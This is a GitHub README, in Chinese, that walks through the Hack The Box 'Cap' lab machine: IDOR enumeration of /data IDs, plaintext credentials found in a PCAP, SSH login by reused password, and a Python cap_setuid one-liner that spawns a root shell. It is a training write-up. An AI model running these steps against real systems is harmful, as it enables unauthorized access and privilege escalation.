aryanchoudhary11/HTB-CAP

GitHub: aryanchoudhary11/HTB-CAP

一份 Hack The Box Cap 机器的完整渗透写讲,覆盖 IDOR、PCAP 分析、凭证重用与 Linux 能力滥用到提根。

Stars: 0 | Forks: 0

# 🔐 Hack The Box — Cap (Writeup) ## 📌 机器信息 | 属性 | 值 | | ----------- | --------------------------------------------------------- | | 名称 | Cap | | 平台 | Hack The Box | | 操作系统 | Linux | | 关注领域 | IDOR, PCAP 分析, 凭据重用, Linux Capabilities | ## 🧠 目标 * 枚举目标 * 识别漏洞 * 获取 user 权限 * 提权至 root ## 🌐 初始侦察 连接到 HTB VPN 后,可以通过 HTTP 访问目标 Web 应用。 该应用暴露了多项功能: * 安全快照(Security Snapshot) * IP 配置(IP Config) * Netstat 这些功能暗示其后端会与系统级命令进行交互并存储扫描结果。 ![初始侦察](https://raw.githubusercontent.com/aryanchoudhary11/HTB-CAP/main/screenshots/Screenshot%202026-04-18%20122257.png) ## 🔍 Web 应用分析 在与 **安全快照** 功能交互时,应用重定向到了以下结构的 URL: ``` /data/{id} ``` 这表明扫描结果是被索引的,并且可以通过 ID 参数进行访问。 ![快照](https://raw.githubusercontent.com/aryanchoudhary11/HTB-CAP/main/screenshots/Screenshot%202026-04-18%20122731.png) ## 🚨 IDOR 漏洞 通过手动修改 `id` 参数: ``` /data/0 /data/1 /data/2 ... ``` 成功访问了属于其他用户的扫描结果。 这证实了存在 **不安全的直接对象引用(IDOR)** 漏洞,从而导致未经授权的数据访问。 ![IDOR](https://raw.githubusercontent.com/aryanchoudhary11/HTB-CAP/main/screenshots/Screenshot%202026-04-18%20122749.png) ## 📦 敏感数据暴露(PCAP 文件) 每个 `/data/{id}` endpoint 都会返回可下载的 `.pcap` 文件。 在枚举过程中发现: ``` /data/0 ``` 包含了有意义的捕获流量。 ## 🔬 PCAP 分析 使用以下工具对 PCAP 文件进行了分析: * Wireshark 在网络捕获中发现了敏感凭据: ``` Username: nathan Password: ******** ``` 这证明了网络流量中存在明文凭据泄露。 ![PCAP 分析](https://raw.githubusercontent.com/aryanchoudhary11/HTB-CAP/main/screenshots/Screenshot%202026-04-18%20122811.png) ## 🔑 凭据重用 使用提取到的凭据,尝试跨服务进行身份验证。 ### SSH 访问 ``` ssh nathan@ ``` 相同的密码成功生效,并获得了 shell 访问权限。 这证实了 **跨服务凭据重用**,这是一个现实世界中常见的漏洞。 ![凭据重用](https://static.pigsec.cn/wp-content/uploads/repos/cas/5e/5e6593faa62ba811d817ad1371c10351b09499fe42a39bc43240890041c87178.png) ## 👤 User 权限 成功登录后: ``` cat /home/nathan/user.txt ``` ## 🚀 权限提升 为了寻找权限提升向量,对 Linux capabilities 进行了枚举: ``` getcap -r / 2>/dev/null ``` ### 🔎 结果 ``` /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip ``` ## ⚠️ 漏洞利用 `cap_setuid` capability 允许任意修改 UID。 利用 Python,成功获取了 root 权限: ``` /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")' ``` ## 👑 Root 访问 权限提升后: ``` cd /root cat root.txt ``` ![最终 Root 访问](https://raw.githubusercontent.com/aryanchoudhary11/HTB-CAP/main/screenshots/Screenshot%202026-04-18%20122958.png) ## 🎯 关键经验 * **IDOR 漏洞**可能会暴露敏感用户数据 * **PCAP 文件**可能包含明文凭据 * **凭据重用**会显著增加攻击的影响范围 * **Linux capabilities**可能会被滥用于权限提升 ## 🛠️ 工具与技术 * Nmap (侦察) * 浏览器 DevTools (分析) * ffuf (枚举) * Wireshark / strings (PCAP 分析) * SSH (访问) * Linux 枚举 (getcap) ## 🔗 攻击链总结 1. Web 枚举 2. IDOR 漏洞利用 3. PCAP 文件发现 4. 凭据提取 5. 通过凭据重用获取 SSH 访问 6. 利用 Capabilities 进行权限提升 7. Root 访问 ## ✅ 结论 **Cap** 机器展示了一条从简单的 Web 漏洞 (IDOR) 开始并最终导致系统被全面攻破的、贴近现实的攻击链。它突显了安全访问控制、妥善处理敏感数据以及限制系统级 capabilities 的重要性。 ## 📌 作者 **Aryan** 网络安全爱好者 | Web 开发人员
标签:CSV导出, Walkthrough, 协议分析, 权限提升, 流量分析, 渗透测试, 漏洞利用, 网络安全, 防御绕过, 隐私保护